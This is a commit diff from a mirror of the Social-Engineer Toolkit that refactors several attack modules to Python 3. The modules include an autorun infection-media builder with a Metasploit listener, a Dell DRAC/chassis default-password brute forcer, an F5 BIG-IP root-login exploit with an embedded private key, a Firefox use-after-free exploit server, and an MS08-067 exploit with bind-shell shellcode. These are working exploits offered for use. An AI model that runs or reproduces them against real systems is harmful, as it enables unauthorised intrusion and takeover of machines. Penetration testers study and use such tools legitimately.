Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-04-04 14:56:08 +00:00
Code Issues Projects Releases Packages Wiki Activity

pep8 and python3 refactoring goodness

Browse source
This commit is contained in:
TrustedSec 2016-01-14 16:26:35 -05:00
parent 4048f03ea4
commit 633a59779b
15 changed files with 588 additions and 412 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

60
src/autorun/autolaunch.py
View file

@ -15,24 +15,27 @@ me = mod_name()
trigger = 0
if check_options("INFECTION_MEDIA=") == "ON":
#if os.path.isfile(setdir + "/standardpayload.file"):
trigger = 1
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" % (setdir,setdir,setdir,setdir), shell=True).wait()
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir, setdir), shell=True).wait()
if os.path.isfile(setdir + "/fileformat.file"):
trigger = 2
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" %
(setdir, setdir), shell=True).wait()
if os.path.isfile(setdir + "/dll/openthis.wab"):
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
trigger = 3
if not os.path.isdir(setdir + "/autorun"): os.makedirs (setdir + "/autorun/")
filewrite = file(setdir + "/autorun/autorun.inf", "w")
if not os.path.isdir(setdir + "/autorun"):
os.makedirs(setdir + "/autorun/")
filewrite = open(setdir + "/autorun/autorun.inf", "w")
# if using standard payloads
if trigger == 1:
payload = "program.exe" #"" + alpha_data + "\""
payload = "program.exe" # "" + alpha_data + "\""
# if using pdf payload
if trigger == 2:
@ -45,31 +48,36 @@ filewrite.write("""[autorun]
open=%s
icon=autorun.ico""" % (payload))
filewrite.close()
print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
print_status(
"Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
print_status(
"Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger == 1 or trigger == 2 or trigger == 3:
choice1 = yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the listener
if not os.path.isfile(setdir + "/meta_config"):
filewrite = file(setdir + "/meta_config", "w")
fileopen = file(setdir + "/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(setdir + "/meta_config"):
filewrite = open(setdir + "/meta_config", "w")
fileopen = open(setdir + "/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
# create the listener
print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("%smsfconsole -r %s/meta_config" % (msf_path, setdir), shell=True).wait()
# create the listener
print_status(
"Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("%smsfconsole -r %s/meta_config" %
(msf_path, setdir), shell=True).wait()
else:
print_warning("cancelling...")
sleep (2)
sleep(2)

6
src/dev-notes/TODO
View file

@ -1,6 +0,0 @@
rel1k:
- add ability to read in port number and IP address (ie. ip:1433)
j0fer:
Add configuration option in set_config to specify sendmail location. Currently hard coded.

2
src/dev-notes/html_color.txt
View file

@ -1,2 +0,0 @@
0193d0
font: century gothic

27
src/fasttrack/autopwn.py
View file

@ -10,10 +10,11 @@ import pexpect
# this will load the database
def prep(database, ranges):
print "\n"
setcore.PrintStatus("Prepping the answer file based on what was specified.")
print("\n")
setcore.PrintStatus(
"Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite=file("src/program_junk/autopwn.answer", "w")
filewrite = open("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
@ -22,7 +23,8 @@ def prep(database, ranges):
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n")
setcore.PrintStatus(
"Answer file has been created and prepped for delivery into Metasploit.\n")
def launch():
@ -31,25 +33,30 @@ def launch():
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..")
setcore.PrintStatus(
"Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path,setdir))
child = pexpect.spawn(
"%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path, setdir))
child.interact()
# handle exceptions and log them
except Exception, error: setcore.log(error)
except Exception as error:
setcore.log(error)
def do_autopwn():
print 'Doing do_autopwn'
print('Doing do_autopwn')
# pull the metasploit database
database = setcore.meta_database()
range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)"))
range = input(setcore.setprompt(
["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))
# prep the answer file
prep(database, range)
confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]"))
confirm_attack = input(setcore.setprompt(
["19", "20"], "You are about to attack systems are you sure [y/n]"))
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":

215
src/fasttrack/delldrac.py
View file

@ -12,13 +12,14 @@
# @TrustedSec
#
##########################################
import urllib
import urllib2
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import re
import threading
import sys
import time
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
@ -59,130 +60,144 @@ class bcolors:
self.backWhite = ''
self.DARKCYAN = ''
print "\n"
print "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
print "Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer"
print ""
print "Written by Dave Kennedy @ TrustedSec"
print "https://www.trustedsec.com"
print "@TrustedSec and @HackingDave"
print "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
print ""
print "This attack vector can be used to identify default installations"
print "of Dell DRAC and Chassis installations. Once found, you can use"
print "the remote administration capabilties to mount a virtual media"
print "device and use it to load for example Back|Track or password"
print "reset iso. From there, add yourself a local administrator account"
print "or dump the SAM database. This will allow you to compromise the"
print "entire infrastructure. You will need to find a DRAC instance that"
print "has an attached server and reboot it into the iso using the virtual"
print "media device."
print ""
print "Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24"
print ""
ipaddr = raw_input("Enter the IP or CIDR: ")
print("\n")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer")
print("")
print("Written by Dave Kennedy @ TrustedSec")
print("https://www.trustedsec.com")
print("@TrustedSec and @HackingDave")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("")
print("This attack vector can be used to identify default installations")
print("of Dell DRAC and Chassis installations. Once found, you can use")
print("the remote administration capabilties to mount a virtual media")
print("device and use it to load for example Back|Track or password")
print("reset iso. From there, add yourself a local administrator account")
print("or dump the SAM database. This will allow you to compromise the")
print("entire infrastructure. You will need to find a DRAC instance that")
print("has an attached server and reboot it into the iso using the virtual")
print("media device.")
print("")
print("Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24")
print("")
ipaddr = input("Enter the IP or CIDR: ")
# try logging into DRAC, chassis is something different
def login_drac(ipaddr_single):
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (ipaddr_single)
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (
ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
# URL encode it
data = urllib.urlencode(opts)
data = urllib.parse.urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
}
# request the page
req = urllib2.Request(url, data, headers)
req = urllib.request.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
response = urllib.request.urlopen(req, timeout=2)
data = response.read()
# if we failed our login, just pass through
if "Failure_Login_IPMI_Then_LDAP" in data:
pass
# Failure_No_Free_Slot means there are no sessions available need to log someone off
# Failure_No_Free_Slot means there are no sessions available need to
# log someone off
if "Failure_No_Free_Slot" in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single))
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single)))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single)
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single))
global global_check2
global_check2 = 1
# handle failed attempts and move on
except: pass
except:
pass
# these are for the centralized dell chassis
def login_chassis(ipaddr_single):
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
# url encode
data = urllib.urlencode(opts)
data = urllib.parse.urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
# request the page
req = urllib2.Request(url, data, headers)
req = urllib.request.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
response = urllib.request.urlopen(req, timeout=2)
data = response.read()
# if we failed to login
if "login_failed_hr_top" in data:
pass # login failed
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single))
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single)))
global global_check3
global_check3 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single)
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single))
global global_check4
global_check4 = 1
# except and move on for failed login attempts
except: pass
except:
pass
# this will check to see if we are using
# a valid IP address for scanning
def is_valid_ip(ip):
pattern = re.compile(r"""
^
@ -221,13 +236,15 @@ def is_valid_ip(ip):
return pattern.match(ip) is not None
# convert to 32 bit binary from standard format
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
if q != "":
b += dec2bin(int(q),8)
b += dec2bin(int(q), 8)
outQuads -= 1
while outQuads > 0:
b += "00000000"
@ -235,28 +252,35 @@ def ip2bin(ip):
return b
# decimal to binary conversion
def dec2bin(n,d=None):
def dec2bin(n, d=None):
s = ""
while n>0:
if n&1:
s = "1"+s
while n > 0:
if n & 1:
s = "1" + s
else:
s = "0"+s
s = "0" + s
n >>= 1
if d is not None:
while len(s)<d:
s = "0"+s
if s == "": s = "0"
while len(s) < d:
s = "0" + s
if s == "":
s = "0"
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0,len(b),8):
ip += str(int(b[i:i+8],2))+"."
for i in range(0, len(b), 8):
ip += str(int(b[i:i + 8], 2)) + "."
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def scan(ipaddr):
if "/" in ipaddr:
parts = ipaddr.split("/")
@ -269,26 +293,29 @@ def scan(ipaddr):
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
ipaddr_single = bin2ip(ipPrefix+dec2bin(i, (32-subnet)))
ipPrefix = baseIP[:-(32 - subnet)]
for i in range(2**(32 - subnet)):
ipaddr_single = bin2ip(ipPrefix + dec2bin(i, (32 - subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
# do this to limit how fast it can scan, anything more causes CPU to hose
# do this to limit how fast it can scan, anything more
# causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
# start our drac BF
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
thread = threading.Thread(
target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
thread = threading.Thread(
target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
@ -304,8 +331,10 @@ def scan(ipaddr):
login_chassis(ipaddr)
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Scanning IP addresses, this could take a few minutes depending on how large the subnet range...")
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " As an example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient.")
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Scanning IP addresses, this could take a few minutes depending on how large the subnet range..."))
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" As an example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient."))
# set global variables to see if we were successful
global_check1 = 0
@ -316,9 +345,11 @@ global_check4 = 0
# kick off the scan
scan(ipaddr)
if global_check1 or global_check2 or global_check3 or global_check4 == 1:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)")
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)"))
else:
print (bcolors.RED + "[!]" + bcolors.ENDC + " Sorry, unable to find any of the Dell servers with default creds..Good luck :(")
print((bcolors.RED + "[!]" + bcolors.ENDC +
" Sorry, unable to find any of the Dell servers with default creds..Good luck :("))
raw_input("Press {return} to exit.")
input("Press {return} to exit.")

11
src/fasttrack/exploits/f5.py
View file

@ -6,9 +6,10 @@
# http://www.trustedsec.com
#
#
import subprocess,os
import subprocess
import os
filewrite = file("priv.key", "w")
filewrite = open("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
@ -26,13 +27,13 @@ LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print """
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
"""
ipaddr=raw_input("Enter the IP address of the F5: ")
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):

13
src/fasttrack/exploits/firefox_3_6_16.py
View file

@ -1,7 +1,7 @@
#!/usr/bin/env python
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr_Me
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
import sys
try:
@ -10,6 +10,7 @@ try:
except ImportError:
pass
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
@ -17,7 +18,7 @@ class myRequestHandler(BaseHTTPRequestHandler):
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
target = self.client_address[0]
self.wfile.write("""
<html>
<body>
@ -142,11 +143,13 @@ trigger();
</html>
""")
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write(
"""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target))
print((
"\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target)))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):

157
src/fasttrack/exploits/ms08067.py
View file

@ -10,31 +10,31 @@ from src.core.setcore import *
import struct
import sys
import time
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
from threading import Thread # Thread is imported incase you would like to modify
# the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
except ImportError as _:
print('Install the following library to make this script work')
print('Impacket : http://oss.coresecurity.com/projects/impacket.html')
print('PyCrypto : http://www.amk.ca/python/code/crypto.html')
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
print('#######################################################################')
print('# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)')
print('# www.hackingspirits.com')
print('# www.coffeeandsecurity.com')
print('# Email: d3basis.m0hanty @ gmail.com')
print('#######################################################################\n')
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
# Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
@ -59,95 +59,100 @@ shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
# Payload for Windows 2000 target
payload_1 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1 += '\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1 += '\x41\x41'
payload_1 += '\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1 += '\xeb\xcc'
payload_1 += '\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
# Payload for Windows 2003[SP2] target
payload_2 = '\x41\x00\x5c\x00'
payload_2 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2 += '\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2 += '\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2 += '\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2 += '\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2 += '\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2 += '\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2 += '\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2 += '\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2 += '\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
target = raw_input("Enter the IP address you want to attack: ")
print "Select target:\n\n 1. Windows 2000\n 2. Windows 2003 SP2\n"
osver = raw_input("Enter the target operating system number: ")
target = input("Enter the IP address you want to attack: ")
print("Select target:\n\n 1. Windows 2000\n 2. Windows 2003 SP2\n")
osver = input("Enter the target operating system number: ")
if osver == "1":
osver = payload_1
print '[-]Windows 2000 payload loaded'
print('[-]Windows 2000 payload loaded')
if osver == "2":
osver=payload_2
print '[-]Windows 2003[SP2] payload loaded'
osver = payload_2
print('[-]Windows 2003[SP2] payload loaded')
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
print('[-]Initiating connection')
self.__trans = transport.DCERPCTransportFactory(
'ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
print('[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
self.__dce.bind(uuid.uuidtup_to_bin(
('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
self.__stub = '\x01\x00\x00\x00'
self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub += shellcode
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x00\x00\x00\x00'
self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub += payload
self.__stub += '\x00\x00\x00\x00'
self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
